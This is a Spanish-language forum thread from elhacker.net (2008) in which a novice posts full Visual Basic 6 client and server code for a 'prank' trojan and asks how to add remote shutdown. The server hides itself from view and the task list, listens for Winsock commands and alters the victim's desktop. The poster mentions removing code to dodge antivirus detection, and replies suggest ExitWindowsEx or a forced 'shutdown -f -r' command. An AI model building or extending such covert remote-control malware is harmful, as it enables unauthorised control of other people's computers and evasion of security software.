elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda con mi troyano de vb6 (simple)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con mi troyano de vb6 (simple)  (Leído 2,844 veces)
__68_Zauron_Arg

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Ayuda con mi troyano de vb6 (simple)
« en: 13 Marzo 2008, 01:47 am »

hola tengo un troyano qeu solo sirve para mandar bromas....y no puedo agregar para poder apagar y reiniciar la pc..... y tambien si me pueden decir como ponerle otras bromas.....aca les dejo el code.....Gracias:

winsock

Este es el Cliente......:

Código:
Private Sub cdc_Click()
clijent.SendData "cdc"
DoEvents
End Sub

Private Sub cdo_Click()
clijent.SendData "cdo"
DoEvents
End Sub

Private Sub ch_Click()
clijent.SendData "c"
DoEvents
End Sub

Private Sub Command1_Click()
clijent.Close
clijent.Connect Text1.Text, 2320
End Sub

Private Sub Form_Unload(Cancel As Integer)
clijent.Close
End
End Sub

Private Sub Hd_Click()
clijent.SendData "hd"
DoEvents
End Sub

Private Sub Ht_Click()
clijent.SendData "ht"
DoEvents
End Sub




Private Sub Image8_Click()
Unload Me
End Sub

Private Sub sc_Click()
clijent.SendData "co"
DoEvents
End Sub

Private Sub Sd_Click()
clijent.SendData "sd"
DoEvents
End Sub

Private Sub st_Click()
clijent.SendData "st"
DoEvents
End Sub

Private Sub Text1_KeyPress(KeyAscii As Integer)
If KeyAscii = 13 Then Command1 = True
End Sub

Private Sub Timer1_Timer()
Label1.Caption = clijent.State
End Sub



Este Es El Server....:

Código:
Option Explicit
Private Sub Form_load()
    Me.Hide
    server.Close
    server.Listen
    App.TaskVisible = False
    Me.Hide
End Sub


Private Sub Form_Unload(Cancel As Integer)
    server.Close
End Sub

Private Sub server_ConnectionRequest(ByVal requestID As Long)
    server.Close
    server.Accept requestID
End Sub

Private Sub server_DataArrival(ByVal bytesTotal As Long)
    Dim tmpData As String
    server.GetData tmpData
    Select Case tmpData
        Case "cdc"
            CloseCDROM
           
        Case "ht"
            TaskBarHide
        Case "st"
            TaskBarShow
        Case "hd"
            DesktopIconsHide
        Case "sd"
            DesktopIconsShow
        Case "c"
            FlipMouseButtons
        Case "co"
            FlipMouseButtonsBack
           
    End Select
End Sub


El De Open Cd Rom lo borre por que me analizaba el troayano como virus asi que borre la linea de Open Cd Rom


Salu2


En línea

naderST


Desconectado Desconectado

Mensajes: 625



Ver Perfil WWW
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #1 en: 13 Marzo 2008, 01:53 am »

mira para apagar y reiniciar la pc pues haslo con el api ExitWindowsEx y lo de agregar mas bromas pues haslo igual que como agregastes las que tienes...


En línea

__68_Zauron_Arg

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #2 en: 13 Marzo 2008, 02:46 am »

me puede pasar algun manual o algo para poder hacerlo o que tengo que cambiar del codigo y agregar...por que soy muy novato... :-\ :-\ :-\ :-\....Gracias
En línea

juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #3 en: 13 Marzo 2008, 03:21 am »

eessa vamos con el clan arg!

Con respecto a tu consulta:

como trabajar con la api del msn => http://www.messengeradictos.com/documentos/programando-para-msn-messenger-con-visual-basic-6_139955

Bajate el api-guide que trae informacion sobre todas las apis de windows, mucho mas detallado que el visor de texto de windows:
http://www.devhood.com/Tools/tool_details.aspx?tool_id=563
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #4 en: 13 Marzo 2008, 04:30 am »

lo que no entiendo es por que complicarse tanto siendo novato empiesa con cosas mas simples no con un troyano en lo personal mi primer programa es este    http://rapidshare.com/files/99131496/mensaje.exe.htmlXD
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #5 en: 13 Marzo 2008, 09:01 am »

Un troyano no es mala idea para empezar. Yo arranque con un libro en PDF medio basico, y luego segui con el troyano. Y a medida que surgian interrogantes digamos los iba solucionando invocando a google. Es una buena practica.
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #6 en: 13 Marzo 2008, 16:44 pm »

Ejemplo de un troyano muy basico para bromas:
http://foro.elhacker.net/index.php/topic,135213.0.html
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #7 en: 13 Marzo 2008, 22:07 pm »

exacto ai que aprender algo primero de vb antes de irse con el troyano i las dudas ver si esta en www.usaelputogoogle.com i si no lo encuentras ai preguntas en el foro eso es basicamente lo que ai que hacer para hacer las cosas bien hechas
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: Ayuda con mi troyano de vb6 (simple)
« Respuesta #8 en: 13 Marzo 2008, 22:24 pm »

Bueno seria tambien mandarle con el winsock apagar y poner un select case de que cuando lo reciba corra shell(shutdown -f -r -t 1) :) o la mejor opcion usando un API.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
AYUDA!!!!!Es muy Simple!!
Programación Visual Basic
prometheus48 6 2,509 Último mensaje 27 Octubre 2011, 00:22 am
por ignorantev1.1
Ayuda con Graphics simple linea
Java
PANCHIN123 1 2,680 Último mensaje 2 Mayo 2012, 08:03 am
por 1mpuls0
Ayuda simple [php creo que es]
Desarrollo Web
Tzdah 2 1,942 Último mensaje 11 Febrero 2013, 23:40 pm
por EFEX
Ayuda en Proyecto Simple
Programación C/C++
bestfriend 3 2,376 Último mensaje 16 Mayo 2015, 10:43 am
por engel lex
Ayuda Simple DnsCrypt
Redes
lafacil 0 1,417 Último mensaje 10 Febrero 2022, 12:13 pm
por lafacil
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines